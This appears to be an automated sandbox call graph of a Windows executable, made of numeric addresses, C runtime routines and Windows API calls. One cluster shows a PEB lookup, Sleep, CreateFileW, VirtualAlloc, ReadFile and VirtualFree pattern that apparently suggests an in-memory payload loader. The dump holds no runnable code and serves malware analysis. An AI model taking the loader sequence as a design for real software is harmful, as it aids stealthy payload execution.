__fseek_nolock 58 API calls 101942 45377 101941->101942 101959 50a02 101942->101959 101944 4537d 101944->101938 101945 42d55 _free 58 API calls 101944->101945 101945->101938 101946->101882 101947->101885 101948->101885 101950 44a50 101949->101950 101954 44a74 101949->101954 101951 446e6 __fseek_nolock 58 API calls 101950->101951 101950->101954 101952 44a6d 101951->101952 101987 4d886 101952->101987 101955 50b77 101954->101955 101956 45371 101955->101956 101957 50b84 101955->101957 101956->101941 101957->101956 101958 42d55 _free 58 API calls 101957->101958 101958->101956 101960 50a0e __mtinitlocknum 101959->101960 101961 50a32 101960->101961 101962 50a1b 101960->101962 101964 50abd 101961->101964 101966 50a42 101961->101966 102112 48af4 58 API calls __getptd_noexit 101962->102112 102117 48af4 58 API calls __getptd_noexit 101964->102117 101965 50a20 102113 48b28 58 API calls __getptd_noexit 101965->102113 101969 50a60 101966->101969 101970 50a6a 101966->101970 102114 48af4 58 API calls __getptd_noexit 101969->102114 101973 4d206 ___lock_fhandle 59 API calls 101970->101973 101971 50a65 102118 48b28 58 API calls __getptd_noexit 101971->102118 101974 50a70 101973->101974 101976 50a83 101974->101976 101977 50a8e 101974->101977 102097 50add 101976->102097 102115 48b28 58 API calls __getptd_noexit 101977->102115 101978 50ac9 102119 48db6 9 API calls __Wcsftime_l 101978->102119 101981 50a27 __mtinitlocknum 101981->101944 101983 50a89 102116 50ab5 LeaveCriticalSection __unlock_fhandle 101983->102116 101985->101934 101986->101938 101988 4d892 __mtinitlocknum 101987->101988 101989 4d8b6 101988->101989 101990 4d89f 101988->101990 101992 4d955 101989->101992 101994 4d8ca 101989->101994 102088 48af4 58 API calls __getptd_noexit 101990->102088 102094 48af4 58 API calls __getptd_noexit 101992->102094 101993 4d8a4 102089 48b28 58 API calls __getptd_noexit 101993->102089 101998 4d8f2 101994->101998 101999 4d8e8 101994->101999 101996 4d8ed 102095 48b28 58 API calls __getptd_noexit 101996->102095 102015 4d206 101998->102015 102090 48af4 58 API calls __getptd_noexit 101999->102090 102001 4d8ab __mtinitlocknum 102001->101954 102004 4d8f8 102006 4d91e 102004->102006 102007 4d90b 102004->102007 102005 4d961 102096 48db6 9 API calls __Wcsftime_l 102005->102096 102091 48b28 58 API calls __getptd_noexit 102006->102091 102024 4d975 102007->102024 102011 4d923 102092 48af4 58 API calls __getptd_noexit 102011->102092 102012 4d917 102093 4d94d LeaveCriticalSection __unlock_fhandle 102012->102093 102016 4d212 __mtinitlocknum 102015->102016 102017 4d261 EnterCriticalSection 102016->102017 102018 49c0b __lock 58 API calls 102016->102018 102019 4d287 __mtinitlocknum 102017->102019 102020 4d237 102018->102020 102019->102004 102021 4d24f 102020->102021 102023 49e2b __mtinitlocknum InitializeCriticalSectionAndSpinCount 102020->102023 102022 4d28b ___lock_fhandle LeaveCriticalSection 102021->102022 102022->102017 102023->102021 102025 4d982 __ftell_nolock 102024->102025 102026 4d9e0 102025->102026 102027 4d9c1 102025->102027 102056 4d9b6 102025->102056 102030 4da38 102026->102030 102031 4da1c 102026->102031 102029 48af4 __close 58 API calls 102027->102029 102028 4c5f6 __except1 6 API calls 102032 4e1d6 102028->102032 102033 4d9c6 102029->102033 102034 4da51 102030->102034 102037 518c1 __lseeki64_nolock 60 API calls 102030->102037 102036 48af4 __close 58 API calls 102031->102036 102032->102012 102035 48b28 __mtinitlocknum 58 API calls 102033->102035 102039 55c6b __stbuf 58 API calls 102034->102039 102038 4d9cd 102035->102038 102040 4da21 102036->102040 102037->102034 102041 48db6 __Wcsftime_l 9 API calls 102038->102041 102042 4da5f 102039->102042 102043 48b28 __mtinitlocknum 58 API calls 102040->102043 102041->102056 102044 4ddb8 102042->102044 102049 499ac _wcstok 58 API calls 102042->102049 102045 4da28 102043->102045 102046 4ddd6 102044->102046 102047 4e14b WriteFile 102044->102047 102048 48db6 __Wcsftime_l 9 API calls 102045->102048 102050 4defa 102046->102050 102060 4ddec 102046->102060 102051 4ddab GetLastError 102047->102051 102058 4dd78 102047->102058 102048->102056 102052 4da8b GetConsoleMode 102049->102052 102054 4dfef 102050->102054 102062 4df05 102050->102062 102051->102058 102052->102044 102055 4daca 102052->102055 102053 4e184 102053->102056 102057 48b28 __mtinitlocknum 58 API calls 102053->102057 102054->102053 102070 4e064 WideCharToMultiByte 102054->102070 102055->102044 102059 4dada GetConsoleCP 102055->102059 102056->102028 102064 4e1b2 102057->102064 102058->102053 102058->102056 102065 4ded8 102058->102065 102059->102053 102086 4db09 102059->102086 102060->102053 102061 4de5b WriteFile 102060->102061 102061->102051 102063 4de98 102061->102063 102062->102053 102066 4df6a WriteFile 102062->102066 102063->102060 102078 4debc 102063->102078 102067 48af4 __close 58 API calls 102064->102067 102068 4dee3 102065->102068 102069 4e17b 102065->102069 102066->102051 102071 4dfb9 102066->102071 102067->102056 102072 48b28 __mtinitlocknum 58 API calls 102068->102072 102073 48b07 __dosmaperr 58 API calls 102069->102073 102070->102051 102080 4e0ab 102070->102080 102071->102058 102071->102062 102071->102078 102075 4dee8 102072->102075 102073->102056 102074 4e0b3 WriteFile 102077 4e106 GetLastError 102074->102077 102074->102080 102079 48af4 __close 58 API calls 102075->102079 102076 435f5 __write_nolock 58 API calls 102076->102086 102077->102080 102078->102058 102079->102056 102080->102054 102080->102058 102080->102074 102080->102078 102081 562ba 60 API calls __write_nolock 102081->102086 102082 4dbf2 WideCharToMultiByte 102082->102058 102083 4dc2d WriteFile 102082->102083 102083->102051 102085 4dc5f 102083->102085 102084 57a5e WriteConsoleW CreateFileW __putwch_nolock 102084->102085 102085->102051 102085->102058 102085->102084 102085->102086 102087 4dc87 WriteFile 102085->102087 102086->102058 102086->102076 102086->102081 102086->102082 102086->102085 102087->102051 102087->102085 102088->101993 102089->102001 102090->101996 102091->102011 102092->102012 102093->102001 102094->101996 102095->102005 102096->102001 102120 4d4c3 102097->102120 102099 50b41 102133 4d43d 59 API calls 2 library calls 102099->102133 102100 50aeb 102100->102099 102101 50b1f 102100->102101 102103 4d4c3 __lseeki64_nolock 58 API calls 102100->102103 102101->102099 102104 4d4c3 __lseeki64_nolock 58 API calls 102101->102104 102106 50b16 102103->102106 102107 50b2b CloseHandle 102104->102107 102105 50b49 102108 50b6b 102105->102108 102134 48b07 58 API calls 3 library calls 102105->102134 102110 4d4c3 __lseeki64_nolock 58 API calls 102106->102110 102107->102099 102111 50b37 GetLastError 102107->102111 102108->101983 102110->102101 102111->102099 102112->101965 102113->101981 102114->101971 102115->101983 102116->101981 102117->101971 102118->101978 102119->101981 102121 4d4e3 102120->102121 102122 4d4ce 102120->102122 102125 48af4 __close 58 API calls 102121->102125 102127 4d508 102121->102127 102123 48af4 __close 58 API calls 102122->102123 102124 4d4d3 102123->102124 102126 48b28 __mtinitlocknum 58 API calls 102124->102126 102128 4d512 102125->102128 102130 4d4db 102126->102130 102127->102100 102129 48b28 __mtinitlocknum 58 API calls 102128->102129 102131 4d51a 102129->102131 102130->102100 102132 48db6 __Wcsftime_l 9 API calls 102131->102132 102132->102130 102133->102105 102134->102108 102197 51940 102135->102197 102138 24799 102203 27d8c 102138->102203 102139 2477c 102140 27bcc 59 API calls 102139->102140 102142 24788 102140->102142 102199 27726 102142->102199 102145 40791 102146 51940 __ftell_nolock 102145->102146 102147 4079e GetLongPathNameW 102146->102147 102148 27bcc 59 API calls 102147->102148 102149 272bd 102148->102149 102150 2700b 102149->102150 102151 27667 59 API calls 102150->102151 102152 2701d 102151->102152 102153 24750 60 API calls 102152->102153 102154 27028 102153->102154 102155 5e885 102154->102155 102156 27033 102154->102156 102162 5e89f 102155->102162 102213 27908 61 API calls 102155->102213 102158 23f74 59 API calls 102156->102158 102159 2703f 102158->102159 102207 234c2 102159->102207 102161 27052 Mailbox 102161->101071 102164 24ddd 136 API calls 102163->102164 102165 2688f 102164->102165 102166 5e031 102165->102166 102167 24ddd 136 API calls 102165->102167 102168 8955b 122 API calls 102166->102168 102169 268a3 102167->102169 102170 5e046 102168->102170 102169->102166 102171 268ab 102169->102171 102172 5e067 102170->102172 102173 5e04a 102170->102173 102175 268b7 102171->102175 102176 5e052 102171->102176 102174 40db6 Mailbox 59 API calls 102172->102174 102177 24e4a 84 API calls 102173->102177 102196 5e0ac Mailbox 102174->102196 102214 26a8c 102175->102214 102321 842f8 90 API calls _wprintf 102176->102321 102177->102176 102181 5e060 102181->102172 102182 5e260 102183 42d55 _free 58 API calls 102182->102183 102184 5e268 102183->102184 102185 24e4a 84 API calls 102184->102185 102190 5e271 102185->102190 102189 42d55 _free 58 API calls 102189->102190 102190->102189 102191 24e4a 84 API calls 102190->102191 102325 7f7a1 89 API calls 4 library calls 102190->102325 102191->102190 102193 27de1 59 API calls 102193->102196 102196->102182 102196->102190 102196->102193 102307 2750f 102196->102307 102315 2735d 102196->102315 102322 7f73d 59 API calls 2 library calls 102196->102322 102323 7f65e 61 API calls 2 library calls 102196->102323 102324 8737f 59 API calls Mailbox 102196->102324 102198 2475d GetFullPathNameW 102197->102198 102198->102138 102198->102139 102200 27734 102199->102200 102201 27d2c 59 API calls 102200->102201 102202 24794 102201->102202 102202->102145 102204 27da6 102203->102204 102205 27d99 102203->102205 102206 40db6 Mailbox 59 API calls 102204->102206 102205->102142 102206->102205 102208 234d4 102207->102208 102212 234f3 _memmove 102207->102212 102210 40db6 Mailbox 59 API calls 102208->102210 102209 40db6 Mailbox 59 API calls 102211 2350a 102209->102211 102210->102212 102211->102161 102212->102209 102213->102155 102215 26ab5 102214->102215 102216 5e41e 102214->102216 102331 257a6 60 API calls Mailbox 102215->102331 102417 7f7a1 89 API calls 4 library calls 102216->102417 102219 5e431 102418 7f7a1 89 API calls 4 library calls 102219->102418 102220 26ad7 102332 257f6 102220->102332 102224 26af4 102226 27667 59 API calls 102224->102226 102225 5e44d 102256 26b61 102225->102256 102227 26b00 102226->102227 102345 40957 60 API calls __ftell_nolock 102227->102345 102229 26b0c 102232 27667 59 API calls 102229->102232 102230 5e460 102233 25c6f CloseHandle 102230->102233 102231 26b6f 102234 27667 59 API calls 102231->102234 102235 26b18 102232->102235 102236 5e46c 102233->102236 102237 26b78 102234->102237 102238 24750 60 API calls 102235->102238 102239 24ddd 136 API calls 102236->102239 102240 27667 59 API calls 102237->102240 102241 26b26 102238->102241 102242 5e488 102239->102242 102243 26b81 102240->102243 102346 25850 ReadFile SetFilePointerEx 102241->102346 102245 5e4b1 102242->102245 102250 8955b 122 API calls 102242->102250 102355 2459b 102243->102355 102419 7f7a1 89 API calls 4 library calls 102245->102419 102249 26b52 102347 25aee 102249->102347 102254 5e4a4 102250->102254 102252 5e4c8 102285 26d0c Mailbox 102252->102285 102257 5e4cd 102254->102257 102258 5e4ac 102254->102258 102256->102230 102256->102231 102260 24e4a 84 API calls 102257->102260 102259 24e4a 84 API calls 102258->102259 102259->102245 102261 5e4d2 102260->102261 102262 40db6 Mailbox 59 API calls 102261->102262 102269 5e506 102262->102269 102266 23bbb 102266->100933 102266->100959 102270 2750f 59 API calls 102269->102270 102304 5e54f Mailbox 102270->102304 102272 5e740 102424 872df 59 API calls Mailbox 102272->102424 102278 5e762 102425 9fbce 59 API calls 2 library calls 102278->102425 102281 5e76f 102283 42d55 _free 58 API calls 102281->102283 102283->102285 102326 257d4 102285->102326 102287 2750f 59 API calls 102287->102304 102297 27de1 59 API calls 102297->102304 102301 5e792 102426 7f7a1 89 API calls 4 library calls 102301->102426 102303 5e7ab 102305 42d55 _free 58 API calls 102303->102305 102304->102272 102304->102287 102304->102297 102304->102301 102420 7f73d 59 API calls 2 library calls 102304->102420 102421 7f65e 61 API calls 2 library calls 102304->102421 102422 8737f 59 API calls Mailbox 102304->102422 102423 27213 59 API calls Mailbox 102304->102423 102306 5e7be 102305->102306 102306->102285 102308 275af 102307->102308 102311 27522 _memmove 102307->102311 102310 40db6 Mailbox 59 API calls 102308->102310 102309 40db6 Mailbox 59 API calls 102312 27529 102309->102312 102310->102311 102311->102309 102313 40db6 Mailbox 59 API calls 102312->102313 102314 27552 102312->102314 102313->102314 102314->102196 102316 27370 102315->102316 102318 2741e 102315->102318 102317 40db6 Mailbox 59 API calls 102316->102317 102320 273a2 102316->102320 102317->102320 102318->102196 102319 40db6 59 API calls Mailbox 102319->102320 102320->102318 102320->102319 102321->102181 102322->102196 102323->102196 102324->102196 102325->102190 102327 25c6f CloseHandle 102326->102327 102328 257dc Mailbox 102327->102328 102329 25c6f CloseHandle 102328->102329 102330 257eb 102329->102330 102330->102266 102331->102220 102333 25c6f CloseHandle 102332->102333 102334 25802 102333->102334 102429 25c99 102334->102429 102336 25821 102340 25844 102336->102340 102437 25610 102336->102437 102338 25833 102454 2527b SetFilePointerEx SetFilePointerEx 102338->102454 102340->102219 102340->102224 102341 5dc07 102455 8345a SetFilePointerEx SetFilePointerEx WriteFile 102341->102455 102342 2583a 102342->102340 102342->102341 102344 5dc37 102344->102340 102345->102229 102346->102249 102348 25b08 102347->102348 102349 25b8f SetFilePointerEx 102348->102349 102350 5dd28 102348->102350 102354 25b63 102348->102354 102468 25c4e SetFilePointerEx 102349->102468 102469 25c4e SetFilePointerEx 102350->102469 102353 5dd42 102354->102256 102356 27667 59 API calls 102355->102356 102357 245b1 102356->102357 102358 27667 59 API calls 102357->102358 102359 245b9 102358->102359 102360 27667 59 API calls 102359->102360 102361 245c1 102360->102361 102362 27667 59 API calls 102361->102362 102363 245c9 102362->102363 102364 5d4d2 102363->102364 102365 245fd 102363->102365 102366 28047 59 API calls 102364->102366 102367 2784b 59 API calls 102365->102367 102368 5d4db 102366->102368 102369 2460b 102367->102369 102370 27d8c 59 API calls 102368->102370 102371 27d2c 59 API calls 102369->102371 102372 24640 102370->102372 102373 24615 102371->102373 102374 24680 102372->102374 102377 2465f 102372->102377 102387 5d4fb 102372->102387 102373->102372 102375 2784b 59 API calls 102373->102375 102470 2784b 102374->102470 102378 24636 102375->102378 102381 279f2 59 API calls 102377->102381 102380 27d2c 59 API calls 102378->102380 102379 5d5cb 102383 27bcc 59 API calls 102379->102383 102380->102372 102384 24669 102381->102384 102384->102374 102392 2784b 59 API calls 102384->102392 102387->102379 102390 5d5b4 102387->102390 102400 5d532 102387->102400 102390->102379 102396 5d59f 102390->102396 102392->102374 102397 5d590 102398 27bcc 59 API calls 102397->102398 102400->102397 102404 5d57b 102400->102404 102405 27bcc 59 API calls 102404->102405 102417->102219 102418->102225 102419->102252 102420->102304 102421->102304 102422->102304 102423->102304 102424->102278 102425->102281 102426->102303 102430 25cb2 CreateFileW 102429->102430 102431 5dd58 102429->102431 102432 25cd4 102430->102432 102431->102432 102433 5dd5e CreateFileW 102431->102433 102432->102336 102433->102432 102434 5dd84 102433->102434 102435 25aee 2 API calls 102434->102435 102436 5dd8f 102435->102436 102436->102432 102438 5dba5 102437->102438 102439 2562b 102437->102439 102448 256ba 102438->102448 102462 25cdf 102438->102462 102440 25aee 2 API calls 102439->102440 102439->102448 102441 2564d 102440->102441 102442 2522e 59 API calls 102441->102442 102444 25657 102442->102444 102444->102438 102445 25664 102444->102445 102446 40db6 Mailbox 59 API calls 102445->102446 102447 2566f 102446->102447 102449 2522e 59 API calls 102447->102449 102448->102338 102450 2567a 102449->102450 102456 25bc0 102450->102456 102452 256a7 102453 25aee 2 API calls 102452->102453 102453->102448 102454->102342 102455->102344 102457 25c33 102456->102457 102461 25bce 102456->102461 102467 25c4e SetFilePointerEx 102457->102467 102458 25bf6 102458->102452 102460 25c06 ReadFile 102460->102458 102460->102461 102461->102458 102461->102460 102463 25aee 2 API calls 102462->102463 102464 25d00 102463->102464 102465 25aee 2 API calls 102464->102465 102466 25d14 102465->102466 102466->102448 102467->102461 102468->102354 102469->102353 102471 278b7 102470->102471 102472 2785a 102470->102472 102473 27d2c 59 API calls 102471->102473 102472->102471 102474 27865 102472->102474 102486 26d95 102485->102486 102492 26ea9 102485->102492 102487 40db6 Mailbox 59 API calls 102486->102487 102486->102492 102492->101077 103011 173b5a0 103025 17391f0 103011->103025 103013 173b68c 103028 173b490 103013->103028 103031 173c6b0 GetPEB 103025->103031 103027 173987b 103027->103013 103029 173b499 Sleep 103028->103029 103030 173b4a7 103029->103030 103032 173c6da 103031->103032 103032->103027 103033 21016 103038 24974 103033->103038 103036 42d40 __cinit 67 API calls 103037 21025 103036->103037 103039 40db6 Mailbox 59 API calls 103038->103039 103040 2497c 103039->103040 103041 2101b 103040->103041 103045 24936 103040->103045 103041->103036 103046 24951 103045->103046 103047 2493f 103045->103047 103049 249a0 103046->103049 103048 42d40 __cinit 67 API calls 103047->103048 103048->103046 103050 27667 59 API calls 103049->103050 103051 249b8 GetVersionExW 103050->103051 103052 27bcc 59 API calls 103051->103052 103053 249fb 103052->103053 103054 27d2c 59 API calls 103053->103054 103059 24a28 103053->103059 103055 24a1c 103054->103055 103056 27726 59 API calls 103055->103056 103056->103059 103057 24a93 GetCurrentProcess IsWow64Process 103058 24aac 103057->103058 103061 24ac2 103058->103061 103062 24b2b GetSystemInfo 103058->103062 103059->103057 103060 5d864 103059->103060 103073 24b37 103061->103073 103063 24af8 103062->103063 103063->103041 103066 24ad4 103069 24b37 2 API calls 103066->103069 103067 24b1f GetSystemInfo 103068 24ae9 103067->103068 103068->103063 103071 24aef FreeLibrary 103068->103071 103070 24adc GetNativeSystemInfo 103069->103070 103070->103068 103071->103063 103074 24ad0 103073->103074 103075 24b40 LoadLibraryA 103073->103075 103074->103066 103074->103067 103075->103074 103076 24b51 GetProcAddress 103075->103076 103076->103074 103077 21066 103082 2f76f 103077->103082 103079 2106c 103080 42d40 __cinit 67 API calls 103079->103080 103081 21076 103080->103081 103083 2f790 103082->103083 103115 3ff03 103083->103115 103087 2f7d7 103088 27667 59 API calls 103087->103088 103089 2f7e1 103088->103089 103090 27667 59 API calls 103089->103090 103091 2f7eb 103090->103091 103092 27667 59 API calls 103091->103092 103093 2f7f5 103092->103093 103094 27667 59 API calls 103093->103094 103095 2f833 103094->103095 103096 27667 59 API calls 103095->103096 103097 2f8fe 103096->103097 103125 35f87 103097->103125 103101 2f930 103102 27667 59 API calls 103101->103102 103103 2f93a 103102->103103 103153 3fd9e 103103->103153 103105 2f981 103106 2f991 GetStdHandle 103105->103106 103107 645ab 103106->103107 103108 2f9dd 103106->103108 103107->103108 103110 645b4 103107->103110 103109 2f9e5 OleInitialize 103108->103109 103109->103079 103160 86b38 64 API calls Mailbox 103110->103160 103112 645bb 103161 87207 CreateThread 103112->103161 103114 645c7 CloseHandle 103114->103109 103162 3ffdc 103115->103162 103118 3ffdc 59 API calls 103119 3ff45 103118->103119 103120 27667 59 API calls 103119->103120 103121 3ff51 103120->103121 103122 27bcc 59 API calls 103121->103122 103123 2f796 103122->103123 103124 40162 6 API calls 103123->103124 103124->103087 103126 27667 59 API calls 103125->103126 103127 35f97 103126->103127 103128 27667 59 API calls 103127->103128 103129 35f9f 103128->103129 103169 35a9d 103129->103169 103132 35a9d 59 API calls 103133 35faf 103132->103133 103134 27667 59 API calls 103133->103134 103135 35fba 103134->103135 103136 40db6 Mailbox 59 API calls 103135->103136 103137 2f908 103136->103137 103138 360f9 103137->103138 103139 36107 103138->103139 103140 27667 59 API calls 103139->103140 103141 36112 103140->103141 103142 27667 59 API calls 103141->103142 103143 3611d 103142->103143 103144 27667 59 API calls 103143->103144 103145 36128 103144->103145 103146 27667 59 API calls 103145->103146 103147 36133 103146->103147 103148 35a9d 59 API calls 103147->103148 103149 3613e 103148->103149 103150 40db6 Mailbox 59 API calls 103149->103150 103151 36145 RegisterWindowMessageW 103150->103151 103151->103101 103154 7576f 103153->103154 103155 3fdae 103153->103155 103172 89ae7 60 API calls 103154->103172 103156 40db6 Mailbox 59 API calls 103155->103156 103159 3fdb6 103156->103159 103158 7577a 103159->103105 103160->103112 103161->103114 103173 871ed 65 API calls 103161->103173 103163 27667 59 API calls 103162->103163 103164 3ffe7 103163->103164 103165 27667 59 API calls 103164->103165 103166 3ffef 103165->103166 103167 27667 59 API calls 103166->103167 103168 3ff3b 103167->103168 103168->103118 103170 27667 59 API calls 103169->103170 103171 35aa5 103170->103171 103171->103132 103172->103158 103174 21055 103179 22649 103174->103179 103177 42d40 __cinit 67 API calls 103178 21064 103177->103178 103180 27667 59 API calls 103179->103180 103181 226b7 103180->103181 103186 23582 103181->103186 103184 22754 103185 2105a 103184->103185 103189 23416 59 API calls 2 library calls 103184->103189 103185->103177 103190 235b0 103186->103190 103189->103184 103191 235a1 103190->103191 103192 235bd 103190->103192 103191->103184 103192->103191 103193 235c4 RegOpenKeyExW 103192->103193 103193->103191 103194 235de RegQueryValueExW 103193->103194 103195 23614 RegCloseKey 103194->103195 103196 235ff 103194->103196 103195->103191 103196->103195 103197 173bb4b 103198 173bb52 103197->103198 103199 173bbf0 103198->103199 103200 173bb5a 103198->103200 103217 173c4a0 9 API calls 103199->103217 103204 173b800 103200->103204 103203 173bbd7 103205 17391f0 GetPEB 103204->103205 103208 173b89f 103205->103208 103207 173b8d0 CreateFileW 103207->103208 103214 173b8dd 103207->103214 103209 173b8f9 VirtualAlloc 103208->103209 103208->103214 103215 173ba00 CloseHandle 103208->103215 103216 173ba10 VirtualFree 103208->103216 103218 173c710 GetPEB 103208->103218 103210 173b91a ReadFile 103209->103210 103209->103214 103213 173b938 VirtualAlloc 103210->103213 103210->103214 103211 173bafa 103211->103203 103212 173baec VirtualFree 103212->103211 103213->103208 103213->103214 103214->103211 103214->103212 103215->103208 103216->103208 103217->103203 103219 173c73a 103218->103219 103219->103207 103220 2552a 103227 25ab8 103220->103227 103226 2555a Mailbox 103228 40db6 Mailbox 59 API calls 103227->103228 103229 25acb 103228->103229 103230 40db6 Mailbox 59 API calls 103229->103230 103231 2553c 103230->103231 103232 254d2 103231->103232 103246 258cf 103232->103246 103234 25bc0 2 API calls 103237 254e3 103234->103237 103235 25514 103235->103226 103238 28061 MultiByteToWideChar 103235->103238 103237->103234 103237->103235 103253 25a7a 103237->103253 103239 28087 103238->103239 103240 280ce 103238->103240 103241 40db6 Mailbox 59 API calls 103239->103241 103242 27d8c 59 API calls 103240->103242 103243 2809c MultiByteToWideChar 103241->103243 103245 280c0 103242->103245 103269 2774d 103243->103269 103245->103226 103247 258e0 103246->103247 103248 5dc3c 103246->103248 103247->103237 103262 75ecd 59 API calls Mailbox 103248->103262 103250 5dc46 103251 40db6 Mailbox 59 API calls 103250->103251 103252 5dc52 103251->103252 103254 5dcee 103253->103254 103255 25a8e 103253->103255 103268 75ecd 59 API calls Mailbox 103254->103268 103263 259b9 103255->103263 103258 25a9a 103258->103237 103259 5dcf9 103260 40db6 Mailbox 59 API calls 103259->103260 103261 5dd0e _memmove 103260->103261 103262->103250 103264 259d1 103263->103264 103267 259ca _memmove 103263->103267 103265 40db6 Mailbox 59 API calls 103264->103265 103266 5dc7e 103264->103266 103265->103267 103267->103258 103268->103259 103270 277cf 103269->103270 103271 2775c 103269->103271 103272 27d2c 59 API calls 103270->103272 103271->103270 103274 27768 103271->103274 103273 2777a _memmove 103272->103273 103273->103245 103275 27772 103274->103275 103276 277a0 103274->103276 103281 27f27 59 API calls Mailbox 103275->103281 103277 28029 59 API calls 103276->103277 103279 277aa 103277->103279 103280 40db6 Mailbox 59 API calls 103279->103280 103280->103273 103281->103273 103282 2e5ab 103285 2d100 103282->103285 103284 2e5b9 103286 2d11d 103285->103286 103313 2d37d 103285->103313 103287 626e0 103286->103287 103288 62691 103286->103288 103309 2d144 103286->103309 103329 9a3e6 341 API calls __cinit 103287->103329 103290 62694 103288->103290 103299 626af 103288->103299 103292 626a0 103290->103292 103290->103309 103327 9a9fa 341 API calls 103292->103327 103293 42d40 __cinit 67 API calls 103293->103309 103296 2d434 103321 28a52 68 API calls 103296->103321 103297 628b5 103297->103297 103298 2d54b 103298->103284 103299->103313 103328 9aea2 341 API calls 3 library calls 103299->103328 103303 627fc 103333 9a751 89 API calls 103303->103333 103304 2d443 103304->103284 103307 284c0 69 API calls 103307->103309 103309->103293 103309->103296 103309->103298 103309->103303 103309->103307 103309->103313 103316 29ea0 341 API calls 103309->103316 103317 28047 59 API calls 103309->103317 103319 28740 68 API calls __cinit 103309->103319 103320 28542 68 API calls 103309->103320 103322 2843a 68 API calls 103309->103322 103323 2cf7c 341 API calls 103309->103323 103324 29dda 59 API calls Mailbox 103309->103324 103325 2cf00 89 API calls 103309->103325 103326 2cd7d 341 API calls 103309->103326 103330 28a52 68 API calls 103309->103330 103331 29d3c 60 API calls Mailbox 103309->103331 103332 7678d 60 API calls 103309->103332 103313->103298 103334 89e4a 89 API calls 4 library calls 103313->103334 103316->103309 103317->103309 103319->103309 103320->103309 103321->103304 103322->103309 103323->103309 103324->103309 103325->103309 103326->103309 103327->103298 103328->103313 103329->103309 103330->103309 103331->103309 103332->103309 103333->103313 103334->103297 103335 5fdfc 103372 2ab30 Mailbox _memmove 103335->103372 103337 7617e Mailbox 59 API calls 103360 2a057 103337->103360 103341 60055 103571 89e4a 89 API calls 4 library calls 103341->103571 103345 2b475 103349 28047 59 API calls 103345->103349 103346 40db6 59 API calls Mailbox 103362 29f37 Mailbox 103346->103362 103347 28047 59 API calls 103347->103362 103348 60064 103349->103360 103352 2b47a 103352->103341 103361 609e5 103352->103361 103354 27667 59 API calls 103354->103362 103355 42d40 67 API calls __cinit 103355->103362 103356 76e8f 59 API calls 103356->103362 103357 27de1 59 API calls 103357->103372 103358 609d6 103576 89e4a 89 API calls 4 library calls 103358->103576 103577 89e4a 89 API calls 4 library calls 103361->103577 103362->103341 103362->103345 103362->103346 103362->103347 103362->103352 103362->103354 103362->103355 103362->103356 103362->103358 103362->103360 103363 2a55a 103362->103363 103564 2c8c0 341 API calls 2 library calls 103362->103564 103565 2b900 60 API calls Mailbox 103362->103565 103575 89e4a 89 API calls 4 library calls 103363->103575 103364 9bc6b 341 API calls 103364->103372 103366 2b2b6 103569 2f6a3 341 API calls 103366->103569 103368 29ea0 341 API calls 103368->103372 103369 6086a 103573 29c90 59 API calls Mailbox 103369->103573 103371 60878 103574 89e4a 89 API calls 4 library calls 103371->103574 103372->103357 103372->103360 103372->103362 103372->103364 103372->103366 103372->103368 103372->103369 103372->103371 103374 6085c 103372->103374 103375 2b21c 103372->103375 103377 40db6 59 API calls Mailbox 103372->103377 103380 2b525 103372->103380 103381 76e8f 59 API calls 103372->103381 103386 8d07a 103372->103386 103433 31fc3 103372->103433 103473 9df23 103372->103473 103476 8d07b 103372->103476 103523 9c2e0 103372->103523 103555 87956 103372->103555 103561 7617e 103372->103561 103566 29c90 59 API calls Mailbox 103372->103566 103570 9c193 85 API calls 2 library calls 103372->103570 103374->103337 103374->103360 103567 29d3c 60 API calls Mailbox 103375->103567 103377->103372 103378 2b22d 103568 29d3c 60 API calls Mailbox 103378->103568 103572 89e4a 89 API calls 4 library calls 103380->103572 103381->103372 103387 8d09a 103386->103387 103388 8d0a5 103386->103388 103389 29b3c 59 API calls 103387->103389 103391 27667 59 API calls 103388->103391 103431 8d17f Mailbox 103388->103431 103389->103388 103390 40db6 Mailbox 59 API calls 103392 8d1c8 103390->103392 103393 8d0c9 103391->103393 103394 8d1d4 103392->103394 103579 257a6 60 API calls Mailbox 103392->103579 103395 27667 59 API calls 103393->103395 103397 29837 84 API calls 103394->103397 103398 8d0d2 103395->103398 103400 8d1ec 103397->103400 103399 29837 84 API calls 103398->103399 103401 8d0de 103399->103401 103402 257f6 67 API calls 103400->103402 103403 2459b 59 API calls 103401->103403 103404 8d1fb 103402->103404 103405 8d0f3 103403->103405 103406 8d1ff GetLastError 103404->103406 103407 8d233 103404->103407 103408 27b2e 59 API calls 103405->103408 103414 8d218 103406->103414 103409 8d25e 103407->103409 103410 8d295 103407->103410 103411 8d126 103408->103411 103412 40db6 Mailbox 59 API calls 103409->103412 103415 40db6 Mailbox 59 API calls 103410->103415 103413 8d178 103411->103413 103419 83c37 3 API calls 103411->103419 103418 8d263 103412->103418 103417 29b3c 59 API calls 103413->103417 103429 8d188 Mailbox 103414->103429 103580 258ba CloseHandle 103414->103580 103416 8d29a 103415->103416 103423 27667 59 API calls 103416->103423 103416->103429 103417->103431 103421 8d274 103418->103421 103424 27667 59 API calls 103418->103424 103422 8d136 103419->103422 103581 9fbce 59 API calls 2 library calls 103421->103581 103422->103413 103425 8d13a 103422->103425 103423->103429 103424->103421 103426 27de1 59 API calls 103425->103426 103428 8d147 103426->103428 103578 83a2a 63 API calls Mailbox 103428->103578 103429->103372 103431->103390 103431->103429 103432 8d150 Mailbox 103432->103413 103434 29a98 59 API calls 103433->103434 103435 31fdb 103434->103435 103436 40db6 Mailbox 59 API calls 103435->103436 103440 66585 103435->103440 103438 31ff4 103436->103438 103439 32004 103438->103439 103597 257a6 60 API calls Mailbox 103438->103597 103443 29837 84 API calls 103439->103443 103441 32029 103440->103441 103601 8f574 59 API calls 103440->103601 103444 29b3c 59 API calls 103441->103444 103449 32036 103441->103449 103445 32012 103443->103445 103446 665cd 103444->103446 103447 257f6 67 API calls 103445->103447 103448 665d5 103446->103448 103446->103449 103450 32021 103447->103450 103451 29b3c 59 API calls 103448->103451 103452 25cdf 2 API calls 103449->103452 103450->103440 103450->103441 103600 258ba CloseHandle 103450->103600 103454 3203d 103451->103454 103452->103454 103455 665e7 103454->103455 103456 32057 103454->103456 103458 40db6 Mailbox 59 API calls 103455->103458 103457 27667 59 API calls 103456->103457 103459 3205f 103457->103459 103460 665ed 103458->103460 103582 25572 103459->103582 103462 66601 103460->103462 103602 25850 ReadFile SetFilePointerEx 103460->103602 103467 66605 _memmove 103462->103467 103603 876c4 59 API calls 2 library calls 103462->103603 103464 3206e 103464->103467 103598 29a3c 59 API calls Mailbox 103464->103598 103468 32082 Mailbox 103469 320bc 103468->103469 103470 25c6f CloseHandle 103468->103470 103469->103372 103471 320b0 